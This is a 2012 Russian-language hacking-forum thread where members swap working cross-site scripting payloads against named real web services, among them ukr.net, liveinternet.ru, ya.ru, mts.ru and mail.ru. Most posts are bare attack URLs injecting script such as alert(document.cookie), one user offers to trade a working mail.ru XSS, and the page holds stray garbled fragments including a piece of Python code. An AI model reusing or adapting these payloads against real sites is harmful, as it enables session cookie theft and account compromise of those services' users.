HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.02.2012, 13:02
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Почта Укр.нет

[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+

[/QUOTE]
" if author else f"
Цитата:

По сути можно поставить onerror и onload, нужно только подумать как .
 
Ответить с цитированием

  #2  
Старый 05.02.2012, 13:56
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++
 
Ответить с цитированием

  #3  
Старый 05.02.2012, 16:09
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

[CODE]
http://kino.ukr.net/persons/search?query=">alert('xss')

Также есть активная XSS на самой странице видео.

Уязвимое место "теги"
 
Ответить с цитированием

  #4  
Старый 05.02.2012, 21:31
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

LiveInternet.Ru
  • POST Запрос

    Код:
    http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111">alert(/xss/)


  • Код:
    http://liveinternet.ru/flashes.php?id=58259&page=0&filter=">alert('xss')


  • Код:
    http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo=">alert('xss')


  • Код:
    http://litube.li.ru/yandex/?search_string=111">alert('xss')
 
Ответить с цитированием

  #5  
Старый 09.02.2012, 19:59
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Ya.ru

Уязвимый код:

Код:

1) Заходим на clubs.ya.ru

2) Жмякаем на "Записать мысль"

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"

XSS Выполняется.
 
Ответить с цитированием

  #6  
Старый 10.02.2012, 00:21
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от kravch_v  
3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
XSS Выполняется.
Это не пассивка, а DOM-based
 
Ответить с цитированием

  #7  
Старый 10.02.2012, 01:11
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Цитата:
Сообщение от M_script  
Это не пассивка, а DOM-based
Но тем не менее.

Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются , и еще несколько HTML-Тегов).

,
- выводятся.
 
Ответить с цитированием

  #8  
Старый 10.02.2012, 14:41
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Код:
http://pulse.mts.ru/search?q=">alert(document.cookie)
 
Ответить с цитированием

  #9  
Старый 22.02.2012, 18:33
jacklndn
Новичок
Регистрация: 20.02.2012
Сообщений: 13
С нами: 7487606

Репутация: 0
По умолчанию

На мaил есть рабочая хcс?

Мoгу пoменяться на oбхoд 704 oшибки
 
Ответить с цитированием

  #10  
Старый 26.02.2012, 10:56
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Xss на mail.ru

Работает не во всех платформах OC на Windows 7 не пашет.

Код:
http://search.enc.mail.ru/search_enc?q=">
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...